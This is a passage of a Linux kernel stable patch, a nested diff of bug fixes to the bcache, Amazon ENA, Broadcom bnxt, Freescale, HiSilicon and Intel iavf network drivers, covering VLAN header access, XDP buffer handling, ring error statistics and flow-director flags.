++		if (IS_ERR(c->root))
+ 			goto err;
+ 
+ 		list_del_init(&c->root->list);
+diff --git a/drivers/md/bcache/writeback.c b/drivers/md/bcache/writeback.c
+index 01c7c6ca4789f..18c6e0d2877b5 100644
+--- a/drivers/md/bcache/writeback.c
++++ b/drivers/md/bcache/writeback.c
+@@ -913,7 +913,7 @@ static int bch_dirty_init_thread(void *arg)
+ 	int cur_idx, prev_idx, skip_nr;
+ 
+ 	k = p = NULL;
+-	cur_idx = prev_idx = 0;
++	prev_idx = 0;
+ 
+ 	bch_btree_iter_init(&c->root->keys, &iter, NULL);
+ 	k = bch_btree_iter_next_filter(&iter, &c->root->keys, bch_ptr_bad);
+diff --git a/drivers/net/ethernet/amazon/ena/ena_eth_com.c b/drivers/net/ethernet/amazon/ena/ena_eth_com.c
+index 3d6f0a466a9ed..f9f886289b970 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_eth_com.c
++++ b/drivers/net/ethernet/amazon/ena/ena_eth_com.c
+@@ -328,9 +328,6 @@ static int ena_com_create_and_store_tx_meta_desc(struct ena_com_io_sq *io_sq,
+ 	 * compare it to the stored version, just create the meta
+ 	 */
+ 	if (io_sq->disable_meta_caching) {
+-		if (unlikely(!ena_tx_ctx->meta_valid))
+-			return -EINVAL;
+-
+ 		*have_meta = true;
+ 		return ena_com_create_meta(io_sq, ena_meta);
+ 	}
+diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.c b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+index 42a66b74c1e5b..044b8afde69a0 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_netdev.c
++++ b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+@@ -74,6 +74,8 @@ static void ena_unmap_tx_buff(struct ena_ring *tx_ring,
+ 			      struct ena_tx_buffer *tx_info);
+ static int ena_create_io_tx_queues_in_range(struct ena_adapter *adapter,
+ 					    int first_index, int count);
++static void ena_free_all_io_tx_resources_in_range(struct ena_adapter *adapter,
++						  int first_index, int count);
+ 
+ /* Increase a stat by cnt while holding syncp seqlock on 32bit machines */
+ static void ena_increase_stat(u64 *statp, u64 cnt,
+@@ -457,23 +459,22 @@ static void ena_init_all_xdp_queues(struct ena_adapter *adapter)
+ 
+ static int ena_setup_and_create_all_xdp_queues(struct ena_adapter *adapter)
+ {
++	u32 xdp_first_ring = adapter->xdp_first_ring;
++	u32 xdp_num_queues = adapter->xdp_num_queues;
+ 	int rc = 0;
+ 
+-	rc = ena_setup_tx_resources_in_range(adapter, adapter->xdp_first_ring,
+-					     adapter->xdp_num_queues);
++	rc = ena_setup_tx_resources_in_range(adapter, xdp_first_ring, xdp_num_queues);
+ 	if (rc)
+ 		goto setup_err;
+ 
+-	rc = ena_create_io_tx_queues_in_range(adapter,
+-					      adapter->xdp_first_ring,
+-					      adapter->xdp_num_queues);
++	rc = ena_create_io_tx_queues_in_range(adapter, xdp_first_ring, xdp_num_queues);
+ 	if (rc)
+ 		goto create_err;
+ 
+ 	return 0;
+ 
+ create_err:
+-	ena_free_all_io_tx_resources(adapter);
++	ena_free_all_io_tx_resources_in_range(adapter, xdp_first_ring, xdp_num_queues);
+ setup_err:
+ 	return rc;
+ }
+@@ -1617,20 +1618,23 @@ static void ena_set_rx_hash(struct ena_ring *rx_ring,
+ 	}
+ }
+ 
+-static int ena_xdp_handle_buff(struct ena_ring *rx_ring, struct xdp_buff *xdp)
++static int ena_xdp_handle_buff(struct ena_ring *rx_ring, struct xdp_buff *xdp, u16 num_descs)
+ {
+ 	struct ena_rx_buffer *rx_info;
+ 	int ret;
+ 
++	/* XDP multi-buffer packets not supported */
++	if (unlikely(num_descs > 1)) {
++		netdev_err_once(rx_ring->adapter->netdev,
++				"xdp: dropped unsupported multi-buffer packets\n");
++		ena_increase_stat(&rx_ring->rx_stats.xdp_drop, 1, &rx_ring->syncp);
++		return ENA_XDP_DROP;
++	}
++
+ 	rx_info = &rx_ring->rx_buffer_info[rx_ring->ena_bufs[0].req_id];
+ 	xdp_prepare_buff(xdp, page_address(rx_info->page),
+ 			 rx_info->page_offset,
+ 			 rx_ring->ena_bufs[0].len, false);
+-	/* If for some reason we received a bigger packet than
+-	 * we expect, then we simply drop it
+-	 */
+-	if (unlikely(rx_ring->ena_bufs[0].len > ENA_XDP_MAX_MTU))
+-		return ENA_XDP_DROP;
+ 
+ 	ret = ena_xdp_execute(rx_ring, xdp);
+ 
+@@ -1699,7 +1703,7 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 			  ena_rx_ctx.l4_proto, ena_rx_ctx.hash);
+ 
+ 		if (ena_xdp_present_ring(rx_ring))
+-			xdp_verdict = ena_xdp_handle_buff(rx_ring, &xdp);
++			xdp_verdict = ena_xdp_handle_buff(rx_ring, &xdp, ena_rx_ctx.descs);
+ 
+ 		/* allocate skb and fill it */
+ 		if (xdp_verdict == ENA_XDP_PASS)
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+index b5a49166fa972..4d9d7d1edb9b3 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+@@ -938,11 +938,14 @@ void aq_ring_free(struct aq_ring_s *self)
+ 		return;
+ 
+ 	kfree(self->buff_ring);
++	self->buff_ring = NULL;
+ 
+-	if (self->dx_ring)
++	if (self->dx_ring) {
+ 		dma_free_coherent(aq_nic_get_dev(self->aq_nic),
+ 				  self->size * self->dx_size, self->dx_ring,
+ 				  self->dx_ring_pa);
++		self->dx_ring = NULL;
++	}
+ }
+ 
+ unsigned int aq_ring_fill_stats_data(struct aq_ring_s *self, u64 *data)
+diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
+index 16c490692f422..4950fde82d175 100644
+--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
++++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
+@@ -1923,8 +1923,7 @@ u16 bnx2x_select_queue(struct net_device *dev, struct sk_buff *skb,
+ 
+ 		/* Skip VLAN tag if present */
+ 		if (ether_type == ETH_P_8021Q) {
+-			struct vlan_ethhdr *vhdr =
+-				(struct vlan_ethhdr *)skb->data;
++			struct vlan_ethhdr *vhdr = skb_vlan_eth_hdr(skb);
+ 
+ 			ether_type = ntohs(vhdr->h_vlan_encapsulated_proto);
+ 		}
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index e81cb825dff4c..623cdeb29ed90 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -1796,6 +1796,21 @@ static void bnxt_deliver_skb(struct bnxt *bp, struct bnxt_napi *bnapi,
+ 	napi_gro_receive(&bnapi->napi, skb);
+ }
+ 
++static bool bnxt_rx_ts_valid(struct bnxt *bp, u32 flags,
++			     struct rx_cmp_ext *rxcmp1, u32 *cmpl_ts)
++{
++	u32 ts = le32_to_cpu(rxcmp1->rx_cmp_timestamp);
++
++	if (BNXT_PTP_RX_TS_VALID(flags))
++		goto ts_valid;
++	if (!bp->ptp_all_rx_tstamp || !ts || !BNXT_ALL_RX_TS_VALID(flags))
++		return false;
++
++ts_valid:
++	*cmpl_ts = ts;
++	return true;
++}
++
+ /* returns the following:
+  * 1       - 1 packet successfully received
+  * 0       - successful TPA_START, packet not completed yet
+@@ -1821,6 +1836,7 @@ static int bnxt_rx_pkt(struct bnxt *bp, struct bnxt_cp_ring_info *cpr,
+ 	struct sk_buff *skb;
+ 	struct xdp_buff xdp;
+ 	u32 flags, misc;
++	u32 cmpl_ts;
+ 	void *data;
+ 	int rc = 0;
+ 
+@@ -2043,10 +2059,8 @@ static int bnxt_rx_pkt(struct bnxt *bp, struct bnxt_cp_ring_info *cpr,
+ 		}
+ 	}
+ 
+-	if (unlikely((flags & RX_CMP_FLAGS_ITYPES_MASK) ==
+-		     RX_CMP_FLAGS_ITYPE_PTP_W_TS) || bp->ptp_all_rx_tstamp) {
++	if (bnxt_rx_ts_valid(bp, flags, rxcmp1, &cmpl_ts)) {
+ 		if (bp->flags & BNXT_FLAG_CHIP_P5) {
+-			u32 cmpl_ts = le32_to_cpu(rxcmp1->rx_cmp_timestamp);
+ 			u64 ns, ts;
+ 
+ 			if (!bnxt_get_rx_ts_p5(bp, &ts, cmpl_ts)) {
+@@ -10708,8 +10722,10 @@ static void __bnxt_close_nic(struct bnxt *bp, bool irq_re_init,
+ 	bnxt_free_skbs(bp);
+ 
+ 	/* Save ring stats before shutdown */
+-	if (bp->bnapi && irq_re_init)
++	if (bp->bnapi && irq_re_init) {
+ 		bnxt_get_ring_stats(bp, &bp->net_stats_prev);
++		bnxt_get_ring_err_stats(bp, &bp->ring_err_stats_prev);
++	}
+ 	if (irq_re_init) {
+ 		bnxt_free_irq(bp);
+ 		bnxt_del_napi(bp);
+@@ -10717,10 +10733,8 @@ static void __bnxt_close_nic(struct bnxt *bp, bool irq_re_init,
+ 	bnxt_free_mem(bp, irq_re_init);
+ }
+ 
+-int bnxt_close_nic(struct bnxt *bp, bool irq_re_init, bool link_re_init)
++void bnxt_close_nic(struct bnxt *bp, bool irq_re_init, bool link_re_init)
+ {
+-	int rc = 0;
+-
+ 	if (test_bit(BNXT_STATE_IN_FW_RESET, &bp->state)) {
+ 		/* If we get here, it means firmware reset is in progress
+ 		 * while we are trying to close.  We can safely proceed with
+@@ -10735,15 +10749,18 @@ int bnxt_close_nic(struct bnxt *bp, bool irq_re_init, bool link_re_init)
+ 
+ #ifdef CONFIG_BNXT_SRIOV
+ 	if (bp->sriov_cfg) {
++		int rc;
++
+ 		rc = wait_event_interruptible_timeout(bp->sriov_cfg_wait,
+ 						      !bp->sriov_cfg,
+ 						      BNXT_SRIOV_CFG_WAIT_TMO);
+-		if (rc)
+-			netdev_warn(bp->dev, "timeout waiting for SRIOV config operation to complete!\n");
++		if (!rc)
++			netdev_warn(bp->dev, "timeout waiting for SRIOV config operation to complete, proceeding to close!\n");
++		else if (rc < 0)
++			netdev_warn(bp->dev, "SRIOV config operation interrupted, proceeding to close!\n");
+ 	}
+ #endif
+ 	__bnxt_close_nic(bp, irq_re_init, link_re_init);
+-	return rc;
+ }
+ 
+ static int bnxt_close(struct net_device *dev)
+@@ -10958,6 +10975,34 @@ bnxt_get_stats64(struct net_device *dev, struct rtnl_link_stats64 *stats)
+ 	clear_bit(BNXT_STATE_READ_STATS, &bp->state);
+ }
+ 
++static void bnxt_get_one_ring_err_stats(struct bnxt *bp,
++					struct bnxt_total_ring_err_stats *stats,
++					struct bnxt_cp_ring_info *cpr)
++{
++	struct bnxt_sw_stats *sw_stats = &cpr->sw_stats;
++	u64 *hw_stats = cpr->stats.sw_stats;
++
++	stats->rx_total_l4_csum_errors += sw_stats->rx.rx_l4_csum_errors;
++	stats->rx_total_resets += sw_stats->rx.rx_resets;
++	stats->rx_total_buf_errors += sw_stats->rx.rx_buf_errors;
++	stats->rx_total_oom_discards += sw_stats->rx.rx_oom_discards;
++	stats->rx_total_netpoll_discards += sw_stats->rx.rx_netpoll_discards;
++	stats->rx_total_ring_discards +=
++		BNXT_GET_RING_STATS64(hw_stats, rx_discard_pkts);
++	stats->tx_total_ring_discards +=
++		BNXT_GET_RING_STATS64(hw_stats, tx_discard_pkts);
++	stats->total_missed_irqs += sw_stats->cmn.missed_irqs;
++}
++
++void bnxt_get_ring_err_stats(struct bnxt *bp,
++			     struct bnxt_total_ring_err_stats *stats)
++{
++	int i;
++
++	for (i = 0; i < bp->cp_nr_rings; i++)
++		bnxt_get_one_ring_err_stats(bp, stats, &bp->bnapi[i]->cp_ring);
++}
++
+ static bool bnxt_mc_list_updated(struct bnxt *bp, u32 *rx_mask)
+ {
+ 	struct net_device *dev = bp->dev;
+@@ -13882,6 +13927,8 @@ static int bnxt_resume(struct device *device)
+ 	if (rc)
+ 		goto resume_exit;
+ 
++	bnxt_clear_reservations(bp, true);
++
+ 	if (bnxt_hwrm_func_drv_rgtr(bp, NULL, 0, false)) {
+ 		rc = -ENODEV;
+ 		goto resume_exit;
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.h b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+index 1d2588c92977e..111098b4b6062 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.h
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+@@ -160,7 +160,7 @@ struct rx_cmp {
+ 	#define RX_CMP_FLAGS_ERROR				(1 << 6)
+ 	#define RX_CMP_FLAGS_PLACEMENT				(7 << 7)
+ 	#define RX_CMP_FLAGS_RSS_VALID				(1 << 10)
+-	#define RX_CMP_FLAGS_UNUSED				(1 << 11)
++	#define RX_CMP_FLAGS_PKT_METADATA_PRESENT		(1 << 11)
+ 	 #define RX_CMP_FLAGS_ITYPES_SHIFT			 12
+ 	 #define RX_CMP_FLAGS_ITYPES_MASK			 0xf000
+ 	 #define RX_CMP_FLAGS_ITYPE_UNKNOWN			 (0 << 12)
+@@ -187,6 +187,12 @@ struct rx_cmp {
+ 	__le32 rx_cmp_rss_hash;
+ };
+ 
++#define BNXT_PTP_RX_TS_VALID(flags)				\
++	(((flags) & RX_CMP_FLAGS_ITYPES_MASK) == RX_CMP_FLAGS_ITYPE_PTP_W_TS)
++
++#define BNXT_ALL_RX_TS_VALID(flags)				\
++	!((flags) & RX_CMP_FLAGS_PKT_METADATA_PRESENT)
++
+ #define RX_CMP_HASH_VALID(rxcmp)				\
+ 	((rxcmp)->rx_cmp_len_flags_type & cpu_to_le32(RX_CMP_FLAGS_RSS_VALID))
+ 
+@@ -950,6 +956,17 @@ struct bnxt_sw_stats {
+ 	struct bnxt_cmn_sw_stats cmn;
+ };
+ 
++struct bnxt_total_ring_err_stats {
++	u64			rx_total_l4_csum_errors;
++	u64			rx_total_resets;
++	u64			rx_total_buf_errors;
++	u64			rx_total_oom_discards;
++	u64			rx_total_netpoll_discards;
++	u64			rx_total_ring_discards;
++	u64			tx_total_ring_discards;
++	u64			total_missed_irqs;
++};
++
+ struct bnxt_stats_mem {
+ 	u64		*sw_stats;
+ 	u64		*hw_masks;
+@@ -2007,6 +2024,8 @@ struct bnxt {
+ 	u8			pri2cos_idx[8];
+ 	u8			pri2cos_valid;
+ 
++	struct bnxt_total_ring_err_stats ring_err_stats_prev;
++
+ 	u16			hwrm_max_req_len;
+ 	u16			hwrm_max_ext_req_len;
+ 	unsigned int		hwrm_cmd_timeout;
+@@ -2330,7 +2349,9 @@ int bnxt_open_nic(struct bnxt *, bool, bool);
+ int bnxt_half_open_nic(struct bnxt *bp);
+ void bnxt_half_close_nic(struct bnxt *bp);
+ void bnxt_reenable_sriov(struct bnxt *bp);
+-int bnxt_close_nic(struct bnxt *, bool, bool);
++void bnxt_close_nic(struct bnxt *, bool, bool);
++void bnxt_get_ring_err_stats(struct bnxt *bp,
++			     struct bnxt_total_ring_err_stats *stats);
+ int bnxt_dbg_hwrm_rd_reg(struct bnxt *bp, u32 reg_off, u16 num_words,
+ 			 u32 *reg_buf);
+ void bnxt_fw_exception(struct bnxt *bp);
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_devlink.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_devlink.c
+index 8a6f788f62944..2bdebd9c069d8 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_devlink.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_devlink.c
+@@ -478,15 +478,8 @@ static int bnxt_dl_reload_down(struct devlink *dl, bool netns_change,
+ 			return -ENODEV;
+ 		}
+ 		bnxt_ulp_stop(bp);
+-		if (netif_running(bp->dev)) {
+-			rc = bnxt_close_nic(bp, true, true);
+-			if (rc) {
+-				NL_SET_ERR_MSG_MOD(extack, "Failed to close");
+-				dev_close(bp->dev);
+-				rtnl_unlock();
+-				break;
+-			}
+-		}
++		if (netif_running(bp->dev))
++			bnxt_close_nic(bp, true, true);
+ 		bnxt_vf_reps_free(bp);
+ 		rc = bnxt_hwrm_func_drv_unrgtr(bp);
+ 		if (rc) {
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+index 89f046ce1373c..7260b4671ecca 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+@@ -164,9 +164,8 @@ static int bnxt_set_coalesce(struct net_device *dev,
+ reset_coalesce:
+ 	if (test_bit(BNXT_STATE_OPEN, &bp->state)) {
+ 		if (update_stats) {
+-			rc = bnxt_close_nic(bp, true, false);
+-			if (!rc)
+-				rc = bnxt_open_nic(bp, true, false);
++			bnxt_close_nic(bp, true, false);
++			rc = bnxt_open_nic(bp, true, false);
+ 		} else {
+ 			rc = bnxt_hwrm_set_coal(bp);
+ 		}
+@@ -956,12 +955,7 @@ static int bnxt_set_channels(struct net_device *dev,
+ 			 * before PF unload
+ 			 */
+ 		}
+-		rc = bnxt_close_nic(bp, true, false);
+-		if (rc) {
+-			netdev_err(bp->dev, "Set channel failure rc :%x\n",
+-				   rc);
+-			return rc;
+-		}
++		bnxt_close_nic(bp, true, false);
+ 	}
+ 
+ 	if (sh) {
+@@ -3634,12 +3628,7 @@ static void bnxt_self_test(struct net_device *dev, struct ethtool_test *etest,
+ 		bnxt_run_fw_tests(bp, test_mask, &test_results);
+ 	} else {
+ 		bnxt_ulp_stop(bp);
+-		rc = bnxt_close_nic(bp, true, false);
+-		if (rc) {
+-			etest->flags |= ETH_TEST_FL_FAILED;
+-			bnxt_ulp_start(bp, rc);
+-			return;
+-		}
++		bnxt_close_nic(bp, true, false);
+ 		bnxt_run_fw_tests(bp, test_mask, &test_results);
+ 
+ 		buf[BNXT_MACLPBK_TEST_IDX] = 1;
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c
+index 4faaa9a50f4bc..ae734314f8de5 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c
+@@ -506,9 +506,8 @@ static int bnxt_hwrm_ptp_cfg(struct bnxt *bp)
+ 
+ 	if (netif_running(bp->dev)) {
+ 		if (ptp->rx_filter == HWTSTAMP_FILTER_ALL) {
+-			rc = bnxt_close_nic(bp, false, false);
+-			if (!rc)
+-				rc = bnxt_open_nic(bp, false, false);
++			bnxt_close_nic(bp, false, false);
++			rc = bnxt_open_nic(bp, false, false);
+ 		} else {
+ 			bnxt_ptp_cfg_tstamp_filters(bp);
+ 		}
+diff --git a/drivers/net/ethernet/emulex/benet/be_main.c b/drivers/net/ethernet/emulex/benet/be_main.c
+index b12152e2fca0a..a9e4e6464a04c 100644
+--- a/drivers/net/ethernet/emulex/benet/be_main.c
++++ b/drivers/net/ethernet/emulex/benet/be_main.c
+@@ -1125,7 +1125,7 @@ static struct sk_buff *be_lancer_xmit_workarounds(struct be_adapter *adapter,
+ 						  struct be_wrb_params
+ 						  *wrb_params)
+ {
+-	struct vlan_ethhdr *veh = (struct vlan_ethhdr *)skb->data;
++	struct vlan_ethhdr *veh = skb_vlan_eth_hdr(skb);
+ 	unsigned int eth_hdr_len;
+ 	struct iphdr *ip;
+ 
+diff --git a/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch-flower.c b/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch-flower.c
+index c39b866e2582d..16d3c3610720b 100644
+--- a/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch-flower.c
++++ b/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch-flower.c
+@@ -139,7 +139,8 @@ int dpaa2_switch_acl_entry_add(struct dpaa2_switch_filter_block *filter_block,
+ 	err = dpsw_acl_add_entry(ethsw->mc_io, 0, ethsw->dpsw_handle,
+ 				 filter_block->acl_id, acl_entry_cfg);
+ 
+-	dma_unmap_single(dev, acl_entry_cfg->key_iova, sizeof(cmd_buff),
++	dma_unmap_single(dev, acl_entry_cfg->key_iova,
++			 DPAA2_ETHSW_PORT_ACL_CMD_BUF_SIZE,
+ 			 DMA_TO_DEVICE);
+ 	if (err) {
+ 		dev_err(dev, "dpsw_acl_add_entry() failed %d\n", err);
+@@ -181,8 +182,8 @@ dpaa2_switch_acl_entry_remove(struct dpaa2_switch_filter_block *block,
+ 	err = dpsw_acl_remove_entry(ethsw->mc_io, 0, ethsw->dpsw_handle,
+ 				    block->acl_id, acl_entry_cfg);
+ 
+-	dma_unmap_single(dev, acl_entry_cfg->key_iova, sizeof(cmd_buff),
+-			 DMA_TO_DEVICE);
++	dma_unmap_single(dev, acl_entry_cfg->key_iova,
++			 DPAA2_ETHSW_PORT_ACL_CMD_BUF_SIZE, DMA_TO_DEVICE);
+ 	if (err) {
+ 		dev_err(dev, "dpsw_acl_remove_entry() failed %d\n", err);
+ 		kfree(cmd_buff);
+diff --git a/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch.c b/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch.c
+index 2b5909fa93cfa..b98ef4ba172f6 100644
+--- a/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch.c
++++ b/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch.c
+@@ -1978,9 +1978,6 @@ static int dpaa2_switch_port_attr_set_event(struct net_device *netdev,
+ 	return notifier_from_errno(err);
+ }
+ 
+-static struct notifier_block dpaa2_switch_port_switchdev_nb;
+-static struct notifier_block dpaa2_switch_port_switchdev_blocking_nb;
+-
+ static int dpaa2_switch_port_bridge_join(struct net_device *netdev,
+ 					 struct net_device *upper_dev,
+ 					 struct netlink_ext_ack *extack)
+@@ -2023,9 +2020,7 @@ static int dpaa2_switch_port_bridge_join(struct net_device *netdev,
+ 		goto err_egress_flood;
+ 
+ 	err = switchdev_bridge_port_offload(netdev, netdev, NULL,
+-					    &dpaa2_switch_port_switchdev_nb,
+-					    &dpaa2_switch_port_switchdev_blocking_nb,
+-					    false, extack);
++					    NULL, NULL, false, extack);
+ 	if (err)
+ 		goto err_switchdev_offload;
+ 
+@@ -2059,9 +2054,7 @@ static int dpaa2_switch_port_restore_rxvlan(struct net_device *vdev, int vid, vo
+ 
+ static void dpaa2_switch_port_pre_bridge_leave(struct net_device *netdev)
+ {
+-	switchdev_bridge_port_unoffload(netdev, NULL,
+-					&dpaa2_switch_port_switchdev_nb,
+-					&dpaa2_switch_port_switchdev_blocking_nb);
++	switchdev_bridge_port_unoffload(netdev, NULL, NULL, NULL);
+ }
+ 
+ static int dpaa2_switch_port_bridge_leave(struct net_device *netdev)
+diff --git a/drivers/net/ethernet/freescale/fec_main.c b/drivers/net/ethernet/freescale/fec_main.c
+index 33226a22d8a4a..6d1b760022821 100644
+--- a/drivers/net/ethernet/freescale/fec_main.c
++++ b/drivers/net/ethernet/freescale/fec_main.c
+@@ -3541,31 +3541,26 @@ static int fec_set_features(struct net_device *netdev,
+ 	return 0;
+ }
+ 
+-static u16 fec_enet_get_raw_vlan_tci(struct sk_buff *skb)
+-{
+-	struct vlan_ethhdr *vhdr;
+-	unsigned short vlan_TCI = 0;
+-
+-	if (skb->protocol == htons(ETH_P_ALL)) {
+-		vhdr = (struct vlan_ethhdr *)(skb->data);
+-		vlan_TCI = ntohs(vhdr->h_vlan_TCI);
+-	}
+-
+-	return vlan_TCI;
+-}
+-
+ static u16 fec_enet_select_queue(struct net_device *ndev, struct sk_buff *skb,
+ 				 struct net_device *sb_dev)
+ {
+ 	struct fec_enet_private *fep = netdev_priv(ndev);
+-	u16 vlan_tag;
++	u16 vlan_tag = 0;
+ 
+ 	if (!(fep->quirks & FEC_QUIRK_HAS_AVB))
+ 		return netdev_pick_tx(ndev, skb, NULL);
+ 
+-	vlan_tag = fec_enet_get_raw_vlan_tci(skb);
+-	if (!vlan_tag)
++	/* VLAN is present in the payload.*/
++	if (eth_type_vlan(skb->protocol)) {
++		struct vlan_ethhdr *vhdr = skb_vlan_eth_hdr(skb);
++
++		vlan_tag = ntohs(vhdr->h_vlan_TCI);
++	/*  VLAN is present in the skb but not yet pushed in the payload.*/
++	} else if (skb_vlan_tag_present(skb)) {
++		vlan_tag = skb->vlan_tci;
++	} else {
+ 		return vlan_tag;
++	}
+ 
+ 	return fec_enet_vlan_pri_to_queue[vlan_tag >> 13];
+ }
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+index 5ad22b815b2f0..78d6752fe0519 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+@@ -1532,7 +1532,7 @@ static int hns3_handle_vtags(struct hns3_enet_ring *tx_ring,
+ 	if (unlikely(rc < 0))
+ 		return rc;
+ 
+-	vhdr = (struct vlan_ethhdr *)skb->data;
++	vhdr = skb_vlan_eth_hdr(skb);
+ 	vhdr->h_vlan_TCI |= cpu_to_be16((skb->priority << VLAN_PRIO_SHIFT)
+ 					 & VLAN_PRIO_MASK);
+ 
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+index 6d26ee8eefae9..94cf82668efaa 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+@@ -2986,7 +2986,7 @@ static inline int i40e_tx_prepare_vlan_flags(struct sk_buff *skb,
+ 			rc = skb_cow_head(skb, 0);
+ 			if (rc < 0)
+ 				return rc;
+-			vhdr = (struct vlan_ethhdr *)skb->data;
++			vhdr = skb_vlan_eth_hdr(skb);
+ 			vhdr->h_vlan_TCI = htons(tx_flags >>
+ 						 I40E_TX_FLAGS_VLAN_SHIFT);
+ 		} else {
+diff --git a/drivers/net/ethernet/intel/iavf/iavf.h b/drivers/net/ethernet/intel/iavf/iavf.h
+index 7389855fa307a..ee0871d929302 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf.h
++++ b/drivers/net/ethernet/intel/iavf/iavf.h
+@@ -303,6 +303,7 @@ struct iavf_adapter {
+ #define IAVF_FLAG_QUEUES_DISABLED		BIT(17)
+ #define IAVF_FLAG_SETUP_NETDEV_FEATURES		BIT(18)
+ #define IAVF_FLAG_REINIT_MSIX_NEEDED		BIT(20)
++#define IAVF_FLAG_FDIR_ENABLED			BIT(21)
+ /* duplicates for common code */
+ #define IAVF_FLAG_DCB_ENABLED			0
+ 	/* flags for admin queue service task */
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+index 31e02624aca48..f4ac2b164b3e9 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+@@ -1063,7 +1063,7 @@ iavf_get_ethtool_fdir_entry(struct iavf_adapter *adapter,
+ 	struct iavf_fdir_fltr *rule = NULL;
+ 	int ret = 0;
+ 
+-	if (!FDIR_FLTR_SUPPORT(adapter))
++	if (!(adapter->flags & IAVF_FLAG_FDIR_ENABLED))
+ 		return -EOPNOTSUPP;
+ 
+ 	spin_lock_bh(&adapter->fdir_fltr_lock);
+@@ -1205,7 +1205,7 @@ iavf_get_fdir_fltr_ids(struct iavf_adapter *adapter, struct ethtool_rxnfc *cmd,
+ 	unsigned int cnt = 0;
+ 	int val = 0;
+ 
+-	if (!FDIR_FLTR_SUPPORT(adapter))
++	if (!(adapter->flags & IAVF_FLAG_FDIR_ENABLED))
+ 		return -EOPNOTSUPP;
+ 
+ 	cmd->data = IAVF_MAX_FDIR_FILTERS;
+@@ -1397,7 +1397,7 @@ static int iavf_add_fdir_ethtool(struct iavf_adapter *adapter, struct ethtool_rx
+ 	int count = 50;
+ 	int err;
+ 
+-	if (!FDIR_FLTR_SUPPORT(adapter))
++	if (!(adapter->flags & IAVF_FLAG_FDIR_ENABLED))
+ 		return -EOPNOTSUPP;
+ 
+ 	if (fsp->flow_type & FLOW_MAC_EXT)
+@@ -1438,12 +1438,16 @@ static int iavf_add_fdir_ethtool(struct iavf_adapter *adapter, struct ethtool_rx
+ 	spin_lock_bh(&adapter->fdir_fltr_lock);
+ 	iavf_fdir_list_add_fltr(adapter, fltr);
+ 	adapter->fdir_active_fltr++;
+-	fltr->state = IAVF_FDIR_FLTR_ADD_REQUEST;
+-	adapter->aq_required |= IAVF_FLAG_AQ_ADD_FDIR_FILTER;
++	if (adapter->link_up) {
++		fltr->state = IAVF_FDIR_FLTR_ADD_REQUEST;
++		adapter->aq_required |= IAVF_FLAG_AQ_ADD_FDIR_FILTER;
++	} else {
++		fltr->state = IAVF_FDIR_FLTR_INACTIVE;
++	}
+ 	spin_unlock_bh(&adapter->fdir_fltr_lock);
+ 
+-	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+-
++	if (adapter->link_up)
++		mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ ret:
+ 	if (err && fltr)
+ 		kfree(fltr);
+@@ -1465,7 +1469,7 @@ static int iavf_del_fdir_ethtool(struct iavf_adapter *adapter, struct ethtool_rx
+ 	struct iavf_fdir_fltr *fltr = NULL;
+ 	int err = 0;
+ 
+-	if (!FDIR_FLTR_SUPPORT(adapter))
++	if (!(adapter->flags & IAVF_FLAG_FDIR_ENABLED))
